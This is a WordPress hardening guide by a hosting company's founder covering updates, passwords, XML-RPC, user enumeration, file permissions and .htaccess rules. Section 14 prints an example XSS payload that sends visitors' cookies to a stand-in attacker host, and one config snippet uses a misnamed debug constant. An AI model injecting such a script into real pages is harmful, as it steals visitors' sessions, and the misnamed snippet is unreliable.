The Complete WordPress Security Guide

Dave Abargel,

Securing a WordPress website is an important aspect of any website owner.
As of March 2019 (according to research by w3techs) – WordPress is by far the most popular Content Manager System (CMS). WordPress consists of 60.4% of all websites that use a CMS (Comes out to 33.5% of all websites on the internet).

Cms usage stats 2019

There’s a myth going around the web saying that WordPress isn’t secure and invites a lot of attacks and hacking opportunities, but as you can infer from the numbers – the reason WordPress has more reported security issues and hacked websites is due to it being such a large chunk of the CMS hosted websites. This gives more incentive for hackers to search for security flaws and exploits in WordPress websites, giving them more potential targets.

It is safe to say that WordPress as a system – and especially it’s core files – are highly secured, regularly maintained and is frequently being updated by hundreds of programmers that are part of the open-source community. A large part of the security problems usually are as a results of human error, whether it’s wrong configurations or bad maintenance of WordPress. In this guide we’ll discuss the best maintenance and security advice to best secure your WordPress website.

Security in WordPress must not be taken lightly
Fun Fact – On a weekly basis Google adds to their blacklist more than 20,000 websites for malicious content and more than 50,000 websites for phishing.

In order to make sure your website stays safe and secured, follow this article as we discuss the best ways to maintain and secure your WordPress website.

* This guide is aimed at WordPress websites hosted on a Linux server but maybe relevant for Windows servers as well.

1. Keeping WordPress and it’s components regularly updated

WordPress is a free open-source Content Management System and is maintained by a large community of developers. The CMS includes a bunch of different components: The core WordPress code, themes, and plugins that are installed by the user.

Core Updates

With every update release, WordPress developers upgrade the system in different ways, add new features, improve stability and performance and enhance existing feature’s performances in order to stay up to date with todays standards.

Additionally all updates contains bug fixes that have been found since the previous release, and many times these releases include security fixes and improvements.

Regularly updating to the latest version of WordPress will help immensely in securing your website, and keeping it up to date with the latest features and options.

By default, WordPress automatically installs minor updates, but for major releases you must enable the Automatic Updates feature (in the systems update menu).

Opisrael
Irina Strelnikova / Shutterstock

Because WordPress is an open-source system that is widely available, older releases contain security issues that are well known across the internet and are easy prey for hackers who usually target old and out-dated software. For example, a recent article by Sucuri about a security breach XSS that was fixed with WordPress version 5.1.1.

If your WordPress version is out of date, you’re exposed to many more breaches due to the fact that security flaws in these versions are well known and are easier for attackers than to try and find new flaws and exploits in newer WordPress versions.

On top of all this, it’s important to remember to never perform any changes to WordPress’ core files. Any change made to these files will be deleted when updating – which usually causes website owners to not want to update WordPress. Not updating WordPress will directly impact your website’s security and will surely lead to potential security breaches and other issues in the future.

Updating Themes and Plugins

Following its immense success, a market for WordPress plugins has been born. The market has a vast variety of plugins, made by developers and companies worldwide. This shows just how modular WordPress is, being able to synchronize and utilize an enormous pool of plugins and themes.

As of today, WordPress has tens of thousands of plugins and themes that are readily available to install. These plugins and themes are developed by third-party developers, and most of them make sure to update and support their creations after releasing them.

Keeping your plugins and themes updated is crucial to the security and stability of your website. It’s very important to always try and keep your WordPress version up to date, as well as the plugins and themes that are installed on your website.

* A note on premium/paid plugins and theme (not available through the WordPress plugin repository): Paying for a plugin/theme does not guarantee its quality and security, and in many cases, they aren’t regularly updated or aren’t even updated at all. Even when they are updated, the process is usually complicated and has to be done manually (although some plugins/themes include a way to update them through the WordPress dashboard).

Adding Plugins and Themes

It’s highly recommended to only use plugins and themes that are available on the official WordPress plugin repository, and that is developed by well-known companies. This will prevent any future issues you may have since these plugins and themes were thoroughly checked to make sure they don’t contain any malicious code and are regularly updated. It’s important to note that even official/popular plugins aren’t guaranteed to be perfectly secured and it’s recommended to stick to trusted plugins.

uPress Customers: There are 2 toggles for automatic updates, one for the core WordPress releases and another for plugin updates, both under the WordPress tab.

2. Usernames, strong passwords, user permissions

Picking a unique user name

It’s crucial to pick the correct username for your WordPress website.
Picking “admin” as your username is basically doing half the job for the hackers targeting your website.
This is probably one of the most important and easier steps you can take to secure your website and prevent unnecessary risks.

Picking and using your password

One of the most common methods used by hackers is attempting to guess your WordPress management login details by trying to login with a lot of different passwords, this is called Brute Force. Most likely they’ll try passwords from a large list of known passwords (Dictionary Attack), but other times they will try every combination of characters until they find the correct password (this is what people usually think about when referring to a Brute Force Attack).

WordPress Password
Astrovector / Shutterstock

This is the reason why it’s recommended you create a long and complicated password for your website. This includes not only your WordPress dashboard but also your FTP accounts, databases, managed hosting, email tied to recovering your website and pretty much every other service that’s tied to your website.

There’s a surprising amount of WordPress users that use phrases such as “password” or “12345678” as their password. These passwords, along with birth dates, ID number and phone number are easy to guess and will be among the first that bots or hackers will try.

Many website owners don’t like to use long and complicated passwords simply because they’re hard to remember. A good solution is to use a complete sentence that makes sense only to you (and even misspelling a word on purpose) and so it is much easier to remember. These kinds of passwords are much better than a single-phrased password (Although only replacing letters with numbers is not secure enough).
Another solution would be to use a password manager that will generate secure passwords and store them for you.

If you’re composing the passwords yourself, it’s recommended to use at least 8 characters, and include the following:
• Numbers (1-9)
• Smaller case letters (a-z)
• Upper case letters (A-Z)
• Special characters (!@#$%^ etc).


Another important thing to note – Never use a password you’ve used in the past. The ideal password is unique, hard to anticipate/guess based on easily accessed information.

Strict permission management

Another way to minimize security risks is to run a strict and clear policy with your user permissions. In other words, don’t give anyone access to your WordPress dashboard unless you absolutely have to.

If you have a large team, designers, editors, SEO managers etc. make sure you understand their needs and their respected skills before giving them their own users and permissions to your website.

A quick rundown of all available user roles and their permissions in WordPress:
Subscriber – A user that is registered to your website. He doesn’t have access to any dashboard page except for his own personal profile.
Contributor – Has permission to edit and manage his own posts, but can’t publish (his posts will get sent to an editor or administrator to approve them)
Author – Has permission to edit and publish his own posts.
Editor – Has permission to edit and publish his and other’s posts and pages, but doesn’t access to the “sensitive” areas of the dashboard.
Administrator – The website admin, has permission and access to all features and options available in WordPress.
Super Administrator – (Only available on Multisite installs) Has access to manage all websites on the Multisite network.

* Themes and plugins can add or remove roles

3. Disable the option to edit files from within the WordPress dashboard

By default the WordPress allows editing theme and plugin files through a dedicated code editor in the dashboard. In the wrong hands this tool can be extremely dangerous and a massive security risk as it can be used to include arbitrary code in your plugin/theme, and that’s why we recommend disabling this option completely.

A safer alternative would be to edit the files through an FTP client or through a built-in file manager offered by your hosting provider.
In order to disable the option of editing the files through WordPress you can add the following code to your website’s “wp-config.php” file (make sure to add it above the lines /* That's all, stop editing! Happy blogging. */ )

 define('DISALLOW_FILE_EDIT', true);

4. Restrict access to the login/management areas

Hackers and malware can try and access the management areas (wp-admin) or the login page (wp-login.php) of your website without any restrictions.

If you have control over the firewall, we highly recommend restricting the access to these areas exclusively to the country you or your team are based in, or take it a step further and restrict it to certain IP addresses.

There’s another method of protecting these areas using a password on the server side (popular in Linux OS based Apache servers) that basically provides an extra layer of defense before the hacker/malware can access said areas.

5. Disabling XML-RPC Protocol

The XML-RPC protocol is enabled by default in WordPress from version 3.5 and up, this option helps you remotely connect your WordPress website with other websites and services.

While useful it can be used as in attacks against your website but also can be used to attack other websites on the internet.

For example, regularly hackers or malware that are about to attempt 100 different passwords in order to access your account, they would have to make 100 separate attempts to login (and in this case your security systems should recognize the attempts and block them).

Using XML-RPC, they can use the function system.multicall (which is enabled by default) and try thousands of different passwords using a small amount of attempts, and that’s why if you’re not using XML-RPC – we highly recommend disabling this feature.

You can limit the number of XML-RPC connection by using one of the following ways:
• Blocking access to the xmlrpc.php file in your firewall or in your server configuration (eg. .htaccess or nginx.conf files).
• Installing a plugin like Disable XML-RPC which is available for download through the official WordPress repository.

uPress Customers: there an XML-RPC toggle under the security tab which disables the protocol by default.

6. Enable Two-factor authentication

Enabling two-factor authentication on your WordPress website (using another method of authentication using a separate one-time code provided by email, SMS, or generated on another device) can significantly improve your website’s security and provide an extra layer of defense before reaching the sensitive areas of the website.

two-factor authentication
DG-Studio / Shutterstock

One of the easier ways to do this is by using the Google Authenticator plugin that’s available for download from the official WordPress repository and offers 2nd factor authentication via a mobile app.

After installing everything, you will log in with a username and password, and then you’ll be requested to enter a 6 digit code that you can find on the mobile app, this code changes every 30 seconds and can be generated only on the app that is paired with your user account.

Please note: In order for this to work, you must have the Authenticator app installed on your smartphone.

7. Limit the number of failed login attempts

This is actually a fundamental and basic step you must take to properly secure your website from Brute Force attacks.

As we previously mentioned in this article, Brute Force attacks are done by hackers or bots that try to guess your password. They attempt a large number of different passwords until they successfully login to your account.

If there’s no restriction set by the server/firewall/website – the attacker will eventually manage to guess the correct password and will be able to access the dashboard.

This is why it is important to limit the number of failed login attempts before the system automatically blocks the attacker’s IP from accessing the website.

One of the easier ways to set this up is using a plugin called Limit Login Attempts Reloaded that’s available for download from the official WordPress plugin repository.

uPress customers: The plugin WeSafe is installed by default on all the websites on our servers and performs this action.

8. Removing non-active plugins and themes

In August 2011, it was revealed that the popular script TimThumb which is (as of now) included in popular WordPress plugins and themes is in fact vulnerable to malicious exploits. Within days we’d witness attackers using this exploit to their advantage – ranging from spamming promotional material for other websites (SEO Hijacking) and as far as modifying PHP files that are stored on the server with random, meaningless characters at best or even injecting other malicious code and exploits.

Most website owners didn’t realize that the script (and the malware) was running on their server. Some of them deactivated the problematic plugin or theme but did not completely remove them. The fact that the plugin or theme was deactivated was irrelevant since the code still existed on the server and that’s all that was needed for it to be exploitable.

Attackers started scanning websites with hopes of finding the TimThumb exploit. When they found it, they began implanting faulty PHP files on the server, even when the plugins and themes were deactivated, since they still existed and could be accessed directly.

The Golden rule of plugins and themes is if you’re not using a plugin or theme – delete them!
This advice is valid for any piece software: if you’re not using it, simply remove it from your server. There’s no reason to keep it there if there’s use for it.

9. The direct correlation between a backup system and a good night’s sleep

A good and trustful backup system is the first tool in your arsenal against WordPress security exploits. Remember, no website is 100% secured at all times.
If government websites or big international corporate websites are hacked into on a daily basis – your website is vulnerable too.

Having an accessible backup allows you to quickly recover from a breach by restoring your data to a version where they were known to be secure and safe.

You can and should perform backups for your WordPress websites on a few levels:
• On the server level – it’s recommended to perform a daily back for a time frame of at least 30 days, and even better if the backups are stored on a different server.
• Another, less reliable option would be by using a trusted backup plugin for your WordPress website. There are a few free or premium options available, for example: VaultPress or UpdraftPlus, we recommend using a plugin that can send backups to an external cloud storage service (Such as Dropbox, One Drive, etc).

Use the 3-2-1 rule: Keep at least 3 copies of the data, at least on 2 locations, and at least 1 copy off-site

10. Minimum requirements for a secure server

Your hosting service plays the most important part of securing your WordPress website.
A good hosting company is a company that closely monitors new and existing security threats around the web and takes extra measures to protect their servers from these threats and any other future attacks.

Important features we recommend to look out for when choosing your hosting provider:
• Frequent monitoring of their servers in order to detect suspicious activities.
• Meeting the requirements to withstand a DDoS attack.
• Regular maintenance of the core components of the server, frequently updating them to prevent any chance of security exploits.
• Disaster Recovery feature and a contingency plan in case of an emergency so you can protect your valuable information and content.
• Support for PHP version 7.2 at least (versions 7.1 have stopped receiving security updates as of 2020 by official article of php.net)
• Support for MySQL version 5.5 and up
• Separate database user per website on the server
• Isolated users – a complete separation between different users (on shared hosting services)
• Built-in firewall, preferably an applicative one (WAF) that offers options specifically for WordPress
• A Network Intrusion Detection System that regularly scans a wide range of parameters around the activity of your website.
• Regularly performing wide scans of the websites on your server and updating you about them when necessary
• The option for simple tracking of any file changes on your website.

11. Bad Bots – block and prevent

In most cases, hackers tend to send “spies” to check on a website before they start an attack. These are what we call “Bad Bots”.

Bad Bots affect your website’s performance, steal your content, occupy your valuable bandwidth and badly sabotage your website statistics, and most importantly, they look for security vulnerabilities.

You can find a long list of bots that have been marked as “bad” at botreports.com, if you’re using a security plugin/properly secured web hosting service for WordPress – you’re probably already blocking bots on this list.
And yet, if you decide you do want to manually block these bots here are a few ways to do it:
• Blocking them using your firewall (if you’re using it to block them on a number of websites, this is the preferred method)
• At the server configuration level (.htaccess or nginx.conf files).
• Using a plugin like StopBadBots which is free to download from WordPress repository.

uPress customers: There’s a “block bad bots” toggle under the security tab in our management panel.

12. User protection program

By default on WordPress websites it’s possible to access the user’s post archive which lists all of his published posts.
Bots know how to utilize this exploit to access the user’s sensitive information by Brute Forcing their user-ID, like this:

https://www.domain.co.il/?author=1
https://www.domain.co.il/?author=2
https://www.domain.co.il/?author=3

The recommended action is to block access to the path:

https://www.domain.co.il/?author=*

Another option to access sensitive user information would be with Rest API that allows information sharing between different sources.
With Rest API you can access information from a database that’s stored on a remote server (A WordPress website) easily using HTTP.

Starting with WordPress version 4.7 the Rest API is included as part of the core WordPress components and is enabled by default.
This can make it easier for hackers/malware that are trying to steal user information. For example, following this URL:

https://www.domain.co.il/wp-json/wp/v2/users

We’ll receive an organized JSON output of all the users on your website and their information.

We recommend blocking sensitive paths that can be utilized by Rest API (It’s not possible to completely disable this feature because part of it is being used by WordPress and certain plugins, for example, the new visual editor “Gutenberg” that has been included with WordPress version 5.0+ requires this feature)

You can block it in a number of ways:
• Using your firewall to block the path wp-json/wp/v2/users
• Using .htaccess or nginx.conf to block the path wp-json/wp/v2/users
• Using a plugin like Disable Rest API that allows you to block specific Rest API paths or block it entirely for non-logged-in users. The plugin is available for download from the official WordPress repository.

uPress customers: There’s a REST API toggle under the security tab.

13. Hide your WordPress version!

Taking a quick look at your WordPress website’s source code will show you that WordPress automatically embeds a meta tag that contains information about the WordPress version you use.

<meta name="generator" content="WordPress 4.9.10">

This information is accessible to everyone including hackers and malware. Knowing the WordPress versing your website is running makes life easier for them, as they know what kind of attacks and tactics they can use against this specific version.

Articles about old security exploits in older WordPress versions describe the many ways a hacker can exploit the flaw and creates a shortcut to your sensitive information for them. (For example Evidence of a known security hack in WordPress 4.7.0)

Hackers tend to look for websites with the older versions of WordPress who have well-known security exploits. That’s why we strongly recommend keeping WordPress up-to-date.

You can hide your WordPress version by adding the following code to the functions.php file of your theme.

remove_action('wp_head', 'wp_generator');

14. Take care of XSS exploits

An XSS (Cross-Site Scripting) attack is when malicious scripts are injected into your website, usually as a script the runs alongside the browser, and this script is downloaded and run on visiting user’s browsers.
For example, you could inject an XSS script by simply commenting the script as a comment on a post, with the script looking something like this:

<script>window.location="http://attacker-website/?cookie="+document.cookie</script>

If the website isn’t prepared for XSS exploits, what’ll happen is that every user who enters the contaminated article, the comment section will load up with the script, which will start running on the user’s browser (a protected website will show the script in Plain Text).

That was, of course, an example, WordPress by default knows how to deal with XSS filled comments (by using a built-in filtering and sanitation features). You can inject an XSS in many other ways, not just the comment section, it can be done in a search field, a contact form, etc.

You can protect your website from XSS exploits by sanitizing the data before outputting the content. (Sanitizing every component that may be edited by visitors)

15. Hide PHP errors

WordPress comes packed with an error reporting system as part of its core components. This feature is great for developers who want to debug their coding errors (in plugins or themes) but when talking about securing a website, we’re going to want to hide our PHP errors.

For example, a PHP error in WordPress would usually look like this:

PHP: syntax error , unexpected '^' in /wp-content/plugins/plugin.php on line 6

This kind of information makes it easier for hackers or malware to attack, which is why we recommend hiding these error messages from the public eye.
This can be done by editing the wp-config.php file with the following code:

 ini_set('display_errors','Off');
 ini_set('error_reporting', E_ALL );
 define('WordPress_DEBUG', false);
 define('WordPress_DEBUG_DISPLAY', false); 

16. Reset file and folder permissions

Usually, there’s no reason for file and folder permissions to change, but you should make sure the permissions are set up the way WordPress officially suggests.
Remember that a folder with a permission of 777 allows anyone to read and write files in the folder.

According to WordPress (As of March 2019), these are the recommended permissions for a WordPress website:
• wp-config.php needs the permission of 600
• All files need the permission of 644 or 640
• All folders need the permission of 750 or 755

* You can adjust the permissions of files and folders through an FTP client and by using a Reset Permissions button on some hosting services.

file permissions wordpress

uPress customers: There’s a reset permissions button for all files and folders to WordPress’ recommendation under Development → Additional Tools for Web Hosting.

17. Use Authentication keys

By default, WordPress installations come with a wp-config.php file that contains empty encryption. When we use the regular method for a WordPress installation, the system generates an authentication key for our website.
Using unique authentication keys is a very important security procedure you can take to protect your website. These keys are also known as “Security Keys”.

The WordPress system uses these keys to encrypt the information stored on registered user’s cookies (user name and password). The information is turned into a set of random letters and numbers as a hash, that can be decrypted only by using the website’s security keys, thus decreasing the chance of someone restoring a username and password through the cookie on the user’s computer.

For example, this is how authentication keys are set by default:

 define('AUTH_KEY',         'put your unique phrase here');
 define('SECURE_AUTH_KEY',  'put your unique phrase here');
 define('LOGGED_IN_KEY',    'put your unique phrase here');
 define('NONCE_KEY',        'put your unique phrase here');
 define('AUTH_SALT',        'put your unique phrase here');
 define('SECURE_AUTH_SALT', 'put your unique phrase here');
 define('LOGGED_IN_SALT',   'put your unique phrase here');
 define('NONCE_SALT',       'put your unique phrase here');

And this is how authentication keys should look:

define('AUTH_KEY',         'X<@vIF23>d~#%kYe^_>xhv~xUJ*ia*y+ALlJLGv7qFJe<EnpEwD:g~~&$}+DC5eF');
define('SECURE_AUTH_KEY',  'nA@GM?#u7v99Yk+8sM|+ZeF;]P74f`2v|z]{dKS|+cojC.w<&o4LeGvv-]$FWX4^');
define('LOGGED_IN_KEY',    'UNOk*x]$V_a]]vtKZM>`gs2Ht^O/`Rl|>EJzO9/*Y|)tJ2`&rg8FZ 5`l,67)`1U');
define('NONCE_KEY',        'pc-UFE^.+7?+vPD^,i& ^^R?+|I-q+7p>?d2*NZ|zUf|?e&v&?6iz-gF+~m*?(L=');
define('AUTH_SALT',        '7n_U|q1kJ)s)8_#5sb! FY]l)Y!Eyyse85!/$G>qh(XbTYpefVxC_M/naQKhM#PL');
define('SECURE_AUTH_SALT', 'Mw^0=5J5:TWi;fl|*$l|i]f7Gyw-}1@-G5ZPc1atjhg@8v#&& ?1re#D!vtE:g&^');
define('LOGGED_IN_SALT',   '~hZF}x2b&F^Q-WQK8^q>5pS!|6eT^<6z!WSNcv;Jd&8mY2T9M`:S Z ;OYGd[{$e');
define('NONCE_SALT',       'rH&yz6/_S0hXVnJOJ28?]EME!}s>V<%+<[e;FEl:d)t>+P%|atn+Ktq-lpk{+WIM');

Check your wp-config.php file to see if you have unique authentication keys configured.
if you don’t – we recommend you create them at the dedicated WordPress security keys generator and configure them into you wp-config.php.

18. File manager – disabling the option to run PHP files in folders where it’s not necessary

Another way to tighten up your website’s security is to disable the option to run PHP files in folders that do not require them.
For example, the folder /wp-content/uploads/ isn’t supposed to contain any PHP files.
If we disable said option, we’ll effectively block hackers and malware from running PHP files containing security exploits that may exist in this folder.

You can use a .htaccess file to perform this block, here’s how:

# .htaccess - Disable PHP Execution
<Files *.php>
    Order Allow,Deny
    Deny from all
</Files>

uPress customers: This option is an integral part of our management panel and is set to block by PHP files in the uploads directory by default.

19. Secure the important files

The wp-config.php file probably contains the most sensitive information about your website. Among other things are the access credentials for your DB, authentication keys and settings. A crucial step is blocking direct access to the file.

This can be done using the .htaccsess file:

# .htaccess - Protect wp-config.php
<Files wp-config.php>
    Order Allow,Deny
    Deny from all
</Files>

uPress customers: This option is an integral part of our management panel and access to this file is blocked by default.

Another file to secure is the .htaccess file. (on Apache servers) which contains your website’s server configuration. If it is in fact an Apache server, you’d usually protect it on the server level but if that’s not possible, you can use the .htaccess file to protect itself:

# .htaccess - Protect .htaccess
<Files ~ "^.*\.([Hh][Tt][Aa])">
    Order Allow,Deny
    Deny from all
    Satisfy all
</Files>

20. Encrypt your information with TLS (TLS/SSL Certificate)

A TLS certificate’s purpose is to encrypt the data transferred between the user’s browser and the server. We use the TLS (Transport Layer Security) Protocol combined with a dedicated certificate on the server.

The TLS certificate is based on unique encryption keys installed on the website’s server, and only with the use of it can the information be decrypted.

Using the TLS protocol you can be certain that your transferred information to your users is safe from prying eyes.

As of today (March 2019), the option to acquire a TLS certificate is a free option with most hosting providers with the free Let’s Encrypt service.

Upress customers: You can install a TLS certificate from the security tab in our management panel.

21. Closely monitor the activity on your website

Another way to secure your WordPress website is to closely monitor crucial activities that happen in the management area both in real-time and past activity.

In order to properly monitor these activities, you’ll need a logging plugin that’ll run in the background and document every action.

Using such a plugin you can see which users logged on to your website and what they edited, what changes were made, what plugins were added/removed, which media files were uploaded, which configuration changes were made etc.

To do all this, you can use the plugin ARYO Activity Log which is available for download from the official WordPress plugin repository.

Conclusion

Data security in WordPress websites is a sensitive topic that should not be taken lightly, especially when managing a website containing sensitive information. This article has given you many tools to work with even if you are at a moderate technical level.

Each and every one of the tips and methods mentioned above will take you one step closer to a safe, secure website. Any advice you can apply to your WordPress website will make it harder for hackers to successfully break into your website.

A large part of our methods require only a few minutes to implement, so there’s no reason to postpone anything for tomorrow or the next day, get everything done as soon as possible.

Apart from the advice given above, don’t forget these basic rules:
• Never leave yourself logged into your computer while away, always keep it locked with a password.
• Keep your computer clean from viruses
• Try to perform updates when on a safe internet connection.
• Add your website to Google Search Console to get notifications for security issues preventing your website from appearing on the search results pages.
• Apart from the scan you’re going to do when following this guide, perform security scans on a regular basis.
• Don’t open links that look suspicious or if you’re unfamiliar with their sender.
• Don’t confirm warnings stating you’re about to perform a dangerous action before understanding the risks. They warn you for a reason.
• You should consider using reCaptcha on pages with contact forms.

I hope you found this guide useful. Do you have anything to add or your own advice for securing a WordPress website? We’ll be happy to hear from you.

Avatar
Dave Abargel

VP and founder of uPress, developer of Backend & Frontend, specializes in improving performance for WordPress websites, handling advanced security issues, and marketing on social networks. He is an active partner in a number of interesting projects in the field, such as WiPi, Enable, Greenicon, Speedom, and more.

  • You might be interested…

  • Leave a Reply

    Your email address will not be published. Required fields are marked *